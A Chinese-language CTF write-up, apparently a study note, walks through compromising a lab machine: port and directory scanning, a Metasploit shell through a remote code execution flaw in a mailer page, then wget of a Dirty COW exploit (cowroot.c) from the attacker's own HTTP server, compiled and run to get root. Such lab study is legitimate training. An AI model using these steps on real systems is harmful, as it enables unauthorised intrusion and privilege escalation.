0%

第一周靶机

CTF攻击及提权过程笔记

目标识别与扫描

  1. 启动靶机后,使用arp-scan -l扫描,发现靶机IP为192.168.80.155。
    注释截图
  2. 使用nmap -p-扫描常用端口,发现开放22和80端口。
    注释截图
  3. 通过Firefox访问80端口,输入用户名后点击”startthectf”.

注释截图

漏洞扫描与利用

  1. 查看网页源代码无果后,使用nikto扫描,发现网站存在漏洞.

    nikto -h 192.168.80.155

  2. 根据提示替换网址后发现无法访问,重新使用nmap扫描,发现多出一个60080端口.

  3. 注释截图发现网站转移到不同端口,尝试访问/?page页面.
    注释截图

  4. 使用dirb工具扫描,发现一个后缀为mailer的网页.

    dirb http://192.168.80.155/
    注释截图

  5. 查看源代码,发现一段注释,得知存在远程代码执行漏洞.
    注释截图

渗透与提权

  1. 使用Metasploit,修改参数并开启监听.
    注释截图
    注释截图
    注释截图
  2. 复制给出的指令到网址的mail=后,输入sessions查看获取的shell.
  3. 使用sessions 1连接shell,输入sysinfo获取系统信息,然后使用shell -t获得系统shell.
    注释截图
  4. 使用wget下载提权工具,如:cowroot.c.
    注释截图
  5. 使用python3 -m http.server 8081开启Kali的HTTP服务.
  6. 在目标机器上使用wget http://192.168.80.154:8081/cowroot.c下载提权工具.
  7. 使用gcc cowroot.c -o exp -pthread编译提权工具.
  8. 使用chmod +x exp给提权文件赋予执行权限.
  9. 运行提权脚本:./exp.
    注释截图
  10. 最后,进入root目录,发现flag.txt,使用cat命令获取flag.
    注释截图
    这是攻击与提权的一般过程,务必在合法环境中进行此类操作,以免违反法律规定.

Nikto 工具:

定义: Nikto是一个开源的Web服务器扫描工具,用于发现Web服务器上的潜在安全问题。它可以帮助鉴定常见的安全漏洞,如不安全的配置、过时的软件版本等.

用法: nikto -h

  • -h: 指定目标主机的IP地址或域名.

示例: nikto -h 192.168.80.155

Dirb 工具:

定义: Dirb是一个简单的目录爆破工具,用于枚举Web服务器上的目录和文件。它尝试发现隐藏在Web服务器中的目录结构,帮助识别潜在的敏感信息或漏洞.

用法: dirb

  • <target>: 指定目标主机的URL.

示例: dirb http://192.168.80.155/

通过使用这两个工具,你可以更全面地扫描目标系统,识别可能的漏洞和目录结构。记住,在进行渗透测试时,务必获得授权,并仅在授权范围内使用这些工具。

-------------本文结束下次再见-------------

欢迎关注我的其它发布渠道